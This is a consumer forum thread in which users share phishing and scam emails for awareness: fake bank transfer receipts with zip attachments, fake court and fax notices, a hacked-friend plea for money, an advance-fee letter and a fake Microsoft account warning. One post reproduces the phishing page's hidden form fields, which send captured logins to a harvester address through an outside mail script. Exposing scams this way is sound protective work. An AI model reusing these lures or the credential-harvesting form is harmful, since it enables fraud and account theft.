• Welcome to the LegalBeagles Consumer and Legal Forum.
    Please Register to get the most out of the forum. Registration is free and only needs a username and email address.
    REGISTER
    Please do not post your full name, reference numbers or any identifiable details on the forum.

Post up and share your examples of spam phishing emails messages #scamaware

Collapse
X
  • Filter
  • Time
  • Show
Clear All

Re: Post up and share your examples of spam phishing emails messages #scamaware

I had the attached (and clearly scam) e-mail supposedly form Virgin Media, my broadband supplier.

I knew instantly it was a scam as the address it came from was not Virgin but bjtalsma[at]shaw.ca, although I suspect that some people do fall for it. But when I called Virgin to report it they couldn't have been more disinterested in someone posing as themselves and attempting to rip off their customers. Asked if I should forward it to their security department they told me to simply ignore it.

So thanks a bunch for taking your customers' security so seriously, Beardie.
    Attached Files

Comment

With all the scam emails i get the one thing that always gives them away 1st is the fact they do not know my name...its dear customer or something...
      The worst scam email is the type IMO from a friend who has had there computer hacked or scamed...I had an email from my accountant recently saying he was on holiday and been robbed, has major problems "its hell" as phone taken too with all money ,but as he has his computer with him he is emailing clients for help...could i send him some money so he and his family can try and enjoy the rest of there holiday, and he will repay me immediately when he comes back....What a clever scam...If I was close friends with my accountant or it was a friends computer affected then money may have been sent...well, obviously I would have rang them first but some may not thinking a friend is in need .

Comment

Rhea BlandTo enaemm2000@yahoo.co.uk

May 12 at 7:26 PM

Good day!

Your personal account was stopped due spam messages.
        Your funds: 117.71$, have been blocked for 30 days.

The details is in the attached ZIP-file.

Faithfully yours, California Visaback Team

To unsubscribe - please check your notifications settings.

Comment

Here is the letter from my accountant i recieved...it did get me thinking....

Good Morning,

I really hope you get this fast. I could not inform everyone about our trip to Manila, Philippines.My family and I came down here to Manila, Philippines for a short vacation unfortunately we got mugged at the park of the hotel where we stayed, all cash, credit card and cell phones were stolen from us, but luckily for us we still have our passports with us.

It's was a terrible experience..I am sorry if i got you at the wrong time, i have only very few people to run to now..I need to pay some outstanding bills and also take a cab to the airport. I have contacted my bank, but the best they can do is to mail a new card which will take 2 to 3 days to get here.

Please let me know if you can help me out? I promise to make immediate refund when i get home.

Regards,
          Martin

Comment

Sorry the e mail from earlier has vanished, it was to do with subscribing to a scheme to invest in bit coins, there was a genuine looking disclaimer that any investment could be risky to "the volatile nature of this market" but like many others did not call me by name but as "Dear Friend".
            Haven't got any thing to invest but the last two I have received seem to have legitimate looking headers etc. I am suspicious enough to delete or report anything dodgy looking now.
            Never give up, Never surrender.

Comment

Originally posted by IsItRequired View Post
              With all the scam emails i get the one thing that always gives them away 1st is the fact they do not know my name...its dear customer or something...
              The worst scam email is the type IMO from a friend who has had there computer hacked or scamed...I had an email from my accountant recently saying he was on holiday and been robbed, has major problems "its hell" as phone taken too with all money ,but as he has his computer with him he is emailing clients for help...could i send him some money so he and his family can try and enjoy the rest of there holiday, and he will repay me immediately when he comes back....What a clever scam...If I was close friends with my accountant or it was a friends computer affected then money may have been sent...well, obviously I would have rang them first but some may not thinking a friend is in need .
              I agree, especially when the emails appear to come from you! :scared:

Hotmail accounts seem very prone to hacking, virtually all my friends with hotmail accounts have had them hacked some time between 2007 and last year, when I'd start receiving dozens of emails from "them", with links to all sorts of spammy sites.

I've had my own domain since 2001 so never used hotmail, however, shortly after setting up my email address at that time, I had a very clever virus on my PC which picked up file names from my own files, then sent emails to some of my contacts, headed something like "this is the latest version" or "take a look at this after making changes".

The emails all had a nasty zippy containing the virus as the attachment, which had been renamed to match one of the filenames on my computer. Several people got that file purporting to come from me, including my boss, with whom I wasn't in the best of terms at the time! :scared:

Luckily I managed to alert everyone I knew about it after a friend and biz partner of mine got the email with the attachment "from me" and asked my what I wanted him to do with the file "I" had just sent him.

I ALWAYS had an AV program running, but stopped using the big, mainstream ones (you know which ones I mean ) after they took over my system while still letting the nasties through.

Comment

Received today

To: Recipients

From: Microsoft account (sjannik@ethz.ch) You moved this message to its current location.
                Sent: 13 May 2014 14:05:32
                To: Recipients (sjannik@ethz.ch)

Microsoft account
                Your Microsoft Account is temporary Limited
                We detected irregular action on your e-mail system on May 13, 2014.
                As the Primary owner, you must verify your account activity before you can continue using your account, and upon verification, we will remove any restrictions placed on your account.
                click on the following, click here.
                To opt out or change where you receive security notifications, click here.
                Thanks,
                The Microsoft account team
                Which links to forge42.com/wp-content/themes/smartstart/functions/admin/css/hotmail.com/index.htm

And produces this authentic looking login screen

Script with points to h t t p://scripts.hostcenter.dk/form2mail.asp

<input type="hidden" value="evillogz@gmail.com" name="recipient">

<input type="hidden" value="voyage@Rezult.com" name="fromaddress">

<input type="hidden" value="HOTMAIL - NEW" name="subject">

<input type="hidden" value="http://www.live.com" name="redirect">

<input type="hidden" value="REMOTE_HOST,REMOTE_ADDR" name="_envars">

<script src="h t t p:// www.easycounter.com/counter.php?voyage,hotmai_dennis">

Following the script it would seem that there have already been at least 14739 unlucky people who have already fallen for it.
                Attached Files
                Last edited by Tools; 13th May 2014, 15:28:PM.
                Any opinions I give are my own. Any advice I give is without liability. If you are unsure, please seek qualified legal advice.

IF WE HAVE HELPED YOU PLEASE CONSIDER UPGRADING TO VIP - click here

Comment

''
                  Transaction is completed. $1214.47 has been successfully transfered.
                  Transaction ID: #81104973912BF
                  If the transaction was made by mistake please contact our customer service: +07522 37 29 47
                  Receipt on payment is attached: "payment_10.05.14_299688.zip"

Best regards,
                  Monty Mcklveen,
                  Bank Of Scotland,
                  07810 637 349''
                  #staysafestayhome

Any support I provide is offered without liability, if you are unsure please seek professional legal guidance.

Received a Court Claim? Read >>>>> First Steps

Comment

payment@theimagevillage.co.ukTo Me

Today at 5:06 PM

Transaction is completed. $1973.11 has been successfully transfered.
                    Transaction ID: #DD8542CE7532DE
                    If the transaction was made by mistake please contact our customer service: 07948464105
                    Receipt on payment is attached: "payment_10.05.14_328273.zip"

Best regards,
                    Stefany Wimberly,
                    Bank Of Scotland,
                    +075198309

Comment

Today at 2:55 PM

Notice to Appear,

Please bring all documents and witnesses relating to this case with you to Court on your hearing date.
                      The copy of the court notice is attached to this letter.

Truly yours,
                      Clerk to the Court.
                      Ruth Smith

• Court_Notice_LS-UN430
                        .zip

Comment

- - - - - - - begin correspondence - - - - - -

.................................................. .
                        Re: Your-AutoInsurance-Policy #8087131.
                        Notification-ID Number: 8087131

We are reaching out to you today to inform you that your AutoInsurance monthly-payments have
                        just been-reduced.

Visit here and enter in your local ZipCode to check your new monthly-payment: http:// link.readyourmay -autonotice.us

5/13/2014

Thank You.

- - - - - - - finish correspondence - - - - - -
                        #staysafestayhome

Any support I provide is offered without liability, if you are unsure please seek professional legal guidance.

Comment

CreditReportCenter (CreditReportCenter@ .us)
                          Sent: 13 May 2014 23:13:19
                          To:

Be careful! This sender has failed our fraud detection checks.
                          Show content

* * * * * start message * * * * *

TO:

Re: New-Changes & Updates to Your Score.
                          Notification ID No. 13843186

We are sending you this notice today to make you aware that your score may have recently changed due
                          to a number of recent-updates.

Visit here to see how your score was affected by these newest-updates: http:// link. newmayscore-updates. us

>> Today's Score-Generation Time: 46 Seconds <<

Regards,
                          The 2014 Score-Report Team

* * * * * finish message * * * * *
                          #staysafestayhome

Comment

fax@kimservices.co.ukTo Me

Today at 6:24 PM

Date: 2014-05-14 17:23:38 UTC.
                            Pages: 6.
                            Reference number: 2014.05.14_3834141304.

• fax_2014.05.14_3834141304
                              .zip

Comment

USPS.COM
                              Notification

Your parcel has arrived at May 7th, 2014. Courier was unable to deliver the parcel to you.

Print your label and show it in the nearest post office to get a parcel.

Print Shipping Label

Copyright 2014 USPS. All Rights Reserved.

BBC Latest News:

Week in pictures: 3-9 May 2014
                              Best news photos from around the world

Homs residents return to ruins
                              CNN's Fred Pleitgen reports from Homs as Syrians return to a smashed city.

Senators trash talk Super Bowl via Twitter
                              Democrats Michael Bennet of Colo. and Patty Murray of Wash. show pride in their football teams.
                              The other ones were all in Greek or Russian, not sure which one, like:
                              Доставка грузов Стамбул-Москва
                              Last edited by Tools; 15th May 2014, 20:40:PM. Reason: link removed

Comment

Looking forward to my $7.5m...

--
                                FROM THE DESK OF DR. GEORGE PHILLIP

I AM DR. GEORGE PHILLIP OF THE NIGERIA CLEARING HOUSE. I DECIDED TO
                                CONTACT
                                YOU BECAUSE OF THE PREVAILING FINANCIAL REPORT REACHING MY OFFICE AND
                                THE
                                INTENSE NATURE OF POLICY IN NIGERIA: REPLY TO MY PRIVATE EMAIL:
                                GEORGEPHILLIP71@YAHOO.DK

THIS IS TO INFORM YOU ABOUT OUR PLAN TO SEND YOUR FUND TO YOU VIA CASH
                                DELIVERY SYSTEM.THIS SYSTEM WILL BE EASIER FOR YOU AND FOR US. WE ARE
                                GOING
                                TO SEND YOUR PAYMENT OF ($7.5MILLION UNITED STATES DOLLARS) TO YOU
                                THROUGH
                                DIPLOMATIC SHIPMENT WITH THE SERVICES OF A DIPLOMAT,I HAVE SECURED EVERY
                                NEEDED DOCUMENT TO COVER THIS FUND.

NOTE: THIS FUND IS COMING IN SECURITY PROOF BOXES WHICH ARE SEALED WITH
                                SYNTHETIC NYLON SEAL AND PADDED WITH MACHINE. I WILL USE MY POSITION TO
                                RELEASE THIS FUND TO YOU. THE BOXES ARE COMING WITH A COURIER AGENT WHO
                                WILL DELIVER THEM TO YOU AT YOUR HOME ADDRESS IN YOUR COUNTRY.

ALL YOU NEED TO DO NOW IS TO SEND TO ME:

1. FULL NAME.......................... .....................
                                2. TELEPHONE NUMBERS/MOBILE/FAX............ ......
                                3. YOUR AGE........................... .........................
                                4. YOUR SEX........................... .........................
                                5. YOUR OCCUPATION.................... ......................
                                6. YOUR COUNTRY AND CITY.......................... .........
                                7. YOUR HOME ADDRESS....................... ...............
                                8. MARITAL STATUS........................ .....................
                                9. COPY OF YOUR DRIVER"S LICENSE.......................

NOTE: THE AGENT DOES NOT KNOW THE CONTENTS IN THESE BOXES, THE CONTENT
                                WILL
                                BE DECLARED TO HIM AS SENSITIVE PHOTOGRAPHIC FILM MATERIALS.

I WILL SECURE THE CLEARANCE CERTIFICATE THAT WILL BE TAGGED ON THE BOXES
                                WHICH I WILL DISPATCH ALONG WITH THE SECURITY INNER KEYS OF THE
                                CONSIGNMENTS TO ENABLE YOU ACCESS THEM AS SOON AS THEY ARE DELIVERED TO
                                YOU.
                                BEST REGARDS,
                                DR. GEORGE PHILLIP
                                E-MAIL:GEORGEPHILLIP71@YAHOO.DK
                                I'm well on my way to becoming a bi££ionaire!

Comment

View our Terms and Conditions

LegalBeagles Group uses cookies to enhance your browsing experience and to create a secure and effective website. By using this website, you are consenting to such use.To find out more and learn how to manage cookies please read our Cookie and Privacy Policy.

If you would like to opt in, or out, of receiving news and marketing from LegalBeagles Group Ltd you can amend your settings at any time here.

If you would like to cancel your registration please Contact Us. We will delete your user details on request, however, any previously posted user content will remain on the site with your username removed and 'Guest' inserted.
                                Working...
                                X